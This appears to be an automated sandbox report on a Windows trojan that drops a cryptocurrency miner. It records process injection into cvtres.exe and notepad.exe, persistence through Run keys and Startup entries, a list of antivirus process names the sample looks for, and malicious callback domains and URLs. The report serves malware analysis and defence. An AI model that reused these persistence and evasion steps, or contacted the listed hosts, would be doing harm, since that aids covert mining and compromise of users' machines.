Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe base: 401000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe base: 409000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe base: 40C000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe base: 5D3000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe base: 294008	Jump to behavior
Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe base: 400000
Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe base: 401000
Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe base: 409000
Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe base: 40C000
Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe base: 5D3000
Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe base: 237008
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe	Memory written: C:\Windows\notepad.exe base: 400000
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe	Memory written: C:\Windows\notepad.exe base: 401000
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe	Memory written: C:\Windows\notepad.exe base: 938000
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe	Memory written: C:\Windows\notepad.exe base: A15000
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe	Memory written: C:\Windows\notepad.exe base: CD8C44D010

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

Thread register set: target process: 6760

Source: C:\Users\user\Desktop\2rVBokoc2C.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\01Atodo\install.vbs"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\01Atodo\del.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe TASKKILL /IM wscript.exe /F	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe TASKKILL /IM wscript.exe /F	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe TASKKILL /IM wscript.exe /F	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe TASKKILL /IM wscript.exe /F	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\01Atodo\delreg.vbs"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\01Atodo\killroaming.vbs"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\01Atodo\killstatrup.vbs"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\01Atodo\deltemp.vbs"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\01Atodo\start.vbs"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\01Atodo\services.exe services.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\01Atodo\AudioClip.exe AudioClip.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\01Atodo\Replace32640.vbs"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\01Atodo\mavis9080.vbe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe \Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\01Atodo\start.bat" "
Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe \Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\01Atodo\start.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\01Atodo\wininit.exe wininit.exe
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe	Process created: C:\Windows\notepad.exe C:\Windows\notepad.exe" -c "C:\ProgramData\eWTBqYYAek\cfg
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\01Atodo\wininit.exe wininit.exe

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe TASKKILL /IM wscript.exe /F	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe TASKKILL /IM wscript.exe /F	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe TASKKILL /IM wscript.exe /F	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe TASKKILL /IM wscript.exe /F	Jump to behavior

Source: conhost.exe, 0000001C.00000000.547483861.0000027C1B2E0000.00000002.00000001.00040000.00000000.sdmp, conhost.exe, 0000001C.00000002.752626849.0000027C1B2E0000.00000002.00000001.00040000.00000000.sdmp, conhost.exe, 00000023.00000002.755250762.000002A4FE010000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: conhost.exe, 0000001C.00000000.547483861.0000027C1B2E0000.00000002.00000001.00040000.00000000.sdmp, conhost.exe, 0000001C.00000002.752626849.0000027C1B2E0000.00000002.00000001.00040000.00000000.sdmp, conhost.exe, 00000023.00000002.755250762.000002A4FE010000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: conhost.exe, 0000001C.00000000.547483861.0000027C1B2E0000.00000002.00000001.00040000.00000000.sdmp, conhost.exe, 0000001C.00000002.752626849.0000027C1B2E0000.00000002.00000001.00040000.00000000.sdmp, conhost.exe, 00000023.00000002.755250762.000002A4FE010000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: YProgram Managerf
Source: conhost.exe, 0000001C.00000000.547483861.0000027C1B2E0000.00000002.00000001.00040000.00000000.sdmp, conhost.exe, 0000001C.00000002.752626849.0000027C1B2E0000.00000002.00000001.00040000.00000000.sdmp, conhost.exe, 00000023.00000002.755250762.000002A4FE010000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\2rVBokoc2C.exe

Code function: GetLocaleInfoW,GetNumberFormatW,

0_2_00BBA5BC

Source: C:\Users\user\Desktop\2rVBokoc2C.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2rVBokoc2C.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\2rVBokoc2C.exe

Code function: 0_2_00BBEBBB cpuid

0_2_00BBEBBB

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\2rVBokoc2C.exe

Code function: 0_2_00BBD42A GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,

0_2_00BBD42A

Source: C:\Users\user\Desktop\2rVBokoc2C.exe

Code function: 0_2_00BAAC35 GetVersionExW,

0_2_00BAAC35

Source: services.exe, 0000000E.00000002.551526823.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000015.00000002.656226894.000000000364B000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000021.00000000.537477887.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: bdagent.exe
Source: services.exe, 0000000E.00000002.551526823.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000015.00000002.656226894.000000000364B000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000021.00000000.537477887.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: cmdagent.exe
Source: services.exe, 0000000E.00000002.551526823.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000015.00000002.656226894.000000000364B000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000021.00000000.537477887.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: vsserv.exe
Source: services.exe, 0000000E.00000002.551526823.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000015.00000002.656226894.000000000364B000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000021.00000000.537477887.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: cfp.exe
Source: services.exe, 0000000E.00000002.551526823.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000015.00000002.656226894.000000000364B000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000021.00000000.537477887.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: avp.exe
Source: services.exe, 0000000E.00000002.551526823.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000015.00000002.656226894.000000000364B000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000021.00000000.537477887.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: a2start.exe
Source: services.exe, 0000000E.00000002.551526823.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000015.00000002.656226894.000000000364B000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000021.00000000.537477887.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: a2guard.exe
Source: services.exe, 0000000E.00000002.551526823.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000015.00000002.656226894.000000000364B000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000021.00000000.537477887.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: a2service.exe

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	Exfiltration Over Other Network Medium	1 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	12 Scripting	1 Windows Service	1 Windows Service	11 Deobfuscate/Decode Files or Information	LSASS Memory	3 File and Directory Discovery	Remote Desktop Protocol	1 Clipboard Data	Exfiltration Over Bluetooth	1 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	1 Shared Modules	12 Registry Run Keys / Startup Folder	612 Process Injection	12 Scripting	Security Account Manager	46 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	1 Non-Standard Port	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	2 Command and Scripting Interpreter	Logon Script (Mac)	12 Registry Run Keys / Startup Folder	31 Obfuscated Files or Information	NTDS	1 Query Registry	Distributed Component Object Model	Input Capture	Scheduled Transfer	2 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	24 Software Packing	LSA Secrets	241 Security Software Discovery	SSH	Keylogging	Data Transfer Size Limits	2 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 DLL Side-Loading	Cached Domain Credentials	2 Process Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 File Deletion	DCSync	131 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	121 Masquerading	Proc Filesystem	1 Remote System Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	131 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	612 Process Injection	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
2rVBokoc2C.exe	67%	Virustotal		Browse
2rVBokoc2C.exe	29%	Metadefender		Browse
2rVBokoc2C.exe	88%	ReversingLabs	Win32.Trojan.Phonzy
2rVBokoc2C.exe	100%	Avira	HEUR/AGEN.1242196

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\01Atodo\services.exe	100%	Avira	HEUR/AGEN.1202120
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AudioClip.exe	100%	Avira	HEUR/AGEN.1222458
C:\Users\user\AppData\Roaming\01Atodo\AudioClip.exe	100%	Avira	HEUR/AGEN.1222458
C:\Users\user\AppData\Roaming\01Atodo\wininit.exe	100%	Avira	HEUR/AGEN.1213073
C:\Users\user\AppData\Roaming\01Atodo\services.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AudioClip.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\01Atodo\AudioClip.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\01Atodo\wininit.exe	100%	Joe Sandbox ML
C:\ProgramData\eWTBqYYAek\svhproxy	0%	Metadefender		Browse
C:\ProgramData\eWTBqYYAek\svhproxy	0%	ReversingLabs
C:\Users\user\AppData\Roaming\01Atodo\AudioClip.exe	34%	Metadefender		Browse
C:\Users\user\AppData\Roaming\01Atodo\AudioClip.exe	88%	ReversingLabs	ByteCode-MSIL.PUA.Tpyn
C:\Users\user\AppData\Roaming\01Atodo\WinRing0x64.sys	3%	Metadefender		Browse
C:\Users\user\AppData\Roaming\01Atodo\WinRing0x64.sys	5%	ReversingLabs
C:\Users\user\AppData\Roaming\01Atodo\services.exe	23%	Metadefender		Browse
C:\Users\user\AppData\Roaming\01Atodo\services.exe	77%	ReversingLabs	ByteCode-MSIL.Coinminer.BitCoinMiner
C:\Users\user\AppData\Roaming\01Atodo\wininit.exe	34%	Metadefender		Browse
C:\Users\user\AppData\Roaming\01Atodo\wininit.exe	77%	ReversingLabs	Win64.Coinminer.BitCoinMiner
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AudioClip.exe	34%	Metadefender		Browse
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AudioClip.exe	88%	ReversingLabs	ByteCode-MSIL.PUA.Tpyn

Unpacked PE Files

Source	Detection	Scanner	Label	Download
33.2.cvtres.exe.4f3c38.1.unpack	100%	Avira	HEUR/AGEN.1230764	Download File
33.0.cvtres.exe.400000.3.unpack	100%	Avira	TR/ATRAPS.Gen	Download File
22.2.AudioClip.exe.df0000.0.unpack	100%	Avira	HEUR/AGEN.1222458	Download File
14.2.services.exe.c10000.0.unpack	100%	Avira	HEUR/AGEN.1202120	Download File
33.0.cvtres.exe.400000.0.unpack	100%	Avira	TR/ATRAPS.Gen	Download File
33.0.cvtres.exe.400000.1.unpack	100%	Avira	TR/ATRAPS.Gen	Download File
33.0.cvtres.exe.400000.4.unpack	100%	Avira	TR/ATRAPS.Gen	Download File
14.0.services.exe.c10000.0.unpack	100%	Avira	HEUR/AGEN.1202120	Download File
38.0.cvtres.exe.400000.5.unpack	100%	Avira	TR/ATRAPS.Gen	Download File
38.0.cvtres.exe.400000.1.unpack	100%	Avira	TR/ATRAPS.Gen	Download File
33.0.cvtres.exe.400000.5.unpack	100%	Avira	TR/ATRAPS.Gen	Download File
38.0.cvtres.exe.400000.0.unpack	100%	Avira	TR/ATRAPS.Gen	Download File
21.2.services.exe.710000.0.unpack	100%	Avira	HEUR/AGEN.1202120	Download File
21.0.services.exe.710000.0.unpack	100%	Avira	HEUR/AGEN.1202120	Download File
38.2.cvtres.exe.400000.0.unpack	100%	Avira	TR/ATRAPS.Gen	Download File
33.2.cvtres.exe.400000.0.unpack	100%	Avira	TR/ATRAPS.Gen	Download File
38.0.cvtres.exe.400000.3.unpack	100%	Avira	TR/ATRAPS.Gen	Download File
36.0.wininit.exe.7ff690540000.0.unpack	100%	Avira	HEUR/AGEN.1213073	Download File
32.2.AudioClip.exe.c80000.0.unpack	100%	Avira	HEUR/AGEN.1222458	Download File
38.0.cvtres.exe.400000.2.unpack	100%	Avira	TR/ATRAPS.Gen	Download File
30.0.wininit.exe.7ff690540000.0.unpack	100%	Avira	HEUR/AGEN.1213073	Download File
38.0.cvtres.exe.400000.4.unpack	100%	Avira	TR/ATRAPS.Gen	Download File
33.0.cvtres.exe.400000.2.unpack	100%	Avira	TR/ATRAPS.Gen	Download File
22.0.AudioClip.exe.df0000.0.unpack	100%	Avira	HEUR/AGEN.1222458	Download File
32.0.AudioClip.exe.c80000.0.unpack	100%	Avira	HEUR/AGEN.1222458	Download File

Domains

Source	Detection	Scanner	Label	Link
allswork.servebbs.com	1%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://crl.ver)	0%	Avira URL Cloud	safe
https://xmrig.com/benchmark/%s	0%	URL Reputation	safe
https://xmrig.com/wizard	0%	URL Reputation	safe
http://web1705.ath.cx/log.phpM	100%	Avira URL Cloud	malware
https://RtlGetVersionntdll.dll	0%	Avira URL Cloud	safe
http://web1705.ath.cx/log.php	100%	Avira URL Cloud	malware
https://xmrig.com/docs/algorithms	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
soloformin.linkpc.net	216.108.230.28	true	false		high
allswork.servebbs.com	200.83.148.79	true	true	1%, Virustotal, Browse	unknown
updatebss.linkpc.net	64.235.37.55	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://soloformin.linkpc.net/1/config.txt	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crl.ver)	svchost.exe, 0000001A.00000002.775323442.000001B772600000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://xmrig.com/benchmark/%s	2rVBokoc2C.exe, 00000000.00000003.430189255.0000000006A40000.00000004.00000800.00020000.00000000.sdmp, wininit.exe, 0000001E.00000000.540071330.00007FF6908C4000.00000002.00000001.01000000.00000010.sdmp, wininit.exe, 00000024.00000000.548103464.00007FF6908C4000.00000002.00000001.01000000.00000010.sdmp, wininit.exe.0.dr	false	URL Reputation: safe	unknown
https://xmrig.com/wizard	wininit.exe.0.dr	false	URL Reputation: safe	unknown
http://web1705.ath.cx/log.phpM	AudioClip.exe, 00000016.00000002.753618041.00000000016D0000.00000004.08000000.00040000.00000000.sdmp, AudioClip.exe, 00000016.00000002.756623219.00000000033F1000.00000004.00000800.00020000.00000000.sdmp, AudioClip.exe, 00000016.00000002.756645107.000000000341B000.00000004.00000800.00020000.00000000.sdmp, AudioClip.exe, 00000020.00000002.529544830.000000000333B000.00000004.00000800.00020000.00000000.sdmp, AudioClip.exe, 00000020.00000002.529469024.0000000001360000.00000004.08000000.00040000.00000000.sdmp, AudioClip.exe, 00000020.00000002.529527884.0000000003311000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://RtlGetVersionntdll.dll	services.exe, 0000000E.00000002.551526823.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000015.00000002.656226894.000000000364B000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000021.00000000.537477887.0000000000400000.00000040.00000400.00020000.00000000.sdmp, cvtres.exe, 00000026.00000000.549439536.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://web1705.ath.cx/log.php	AudioClip.exe, 00000016.00000002.756645107.000000000341B000.00000004.00000800.00020000.00000000.sdmp, AudioClip.exe, 00000020.00000002.529544830.000000000333B000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://xmrig.com/docs/algorithms	2rVBokoc2C.exe, 00000000.00000003.430189255.0000000006A40000.00000004.00000800.00020000.00000000.sdmp, wininit.exe, 0000001E.00000000.540071330.00007FF6908C4000.00000002.00000001.01000000.00000010.sdmp, wininit.exe, 00000024.00000000.548103464.00007FF6908C4000.00000002.00000001.01000000.00000010.sdmp, wininit.exe.0.dr	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
216.108.230.28	soloformin.linkpc.net	United States	26277	PREMIANETUS	false
200.83.148.79	allswork.servebbs.com	Chile	22047	VTRBANDAANCHASACL	true
64.235.37.55	updatebss.linkpc.net	United States	26277	PREMIANETUS	false

Private

IP
192.168.2.1
127.0.0.1

General Information

Joe Sandbox Version:	35.0.0 Citrine
Analysis ID:	647899
Start date and time: 17/06/202219:39:32	2022-06-17 19:39:32 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 12m 16s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	2rVBokoc2C (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	41
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.adwa.expl.evad.mine.winEXE@69/27@4/5
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 93.6% (good quality ratio 88.9%) Quality average: 78.6% Quality standard deviation: 28%
HCA Information:	Successful, ratio: 98% Number of executed functions: 162 Number of non-executed functions: 87
Cookbook Comments:	Adjust boot time Enable AMSI

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe
Excluded IPs from analysis (whitelisted): 23.35.236.56
Excluded domains from analysis (whitelisted): www.bing.com, licensing.mp.microsoft.com, client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
19:40:47	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exe.lnk
19:40:57	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start.vbs.lnk
19:41:13	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AudioClip.exe
19:41:17	API Interceptor	2x Sleep call for process: svchost.exe modified
19:42:52	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run mavis9080 wscript.exe //B "C:\Users\user\AppData\Roaming/Mavis Hub\mavis9080.vbe"
19:43:08	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Replace32640 wscript.exe //B "C:\Users\user\AppData\Roaming\Replace32640.vbs"
19:43:21	Autostart	Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run mavis9080 wscript.exe //B "C:\Users\user\AppData\Roaming/Mavis Hub\mavis9080.vbe"
19:43:35	Autostart	Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Replace32640 wscript.exe //B "C:\Users\user\AppData\Roaming\Replace32640.vbs"
19:43:47	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run mavis9080 wscript.exe //B "C:\Users\user\AppData\Roaming/Mavis Hub\mavis9080.vbe"

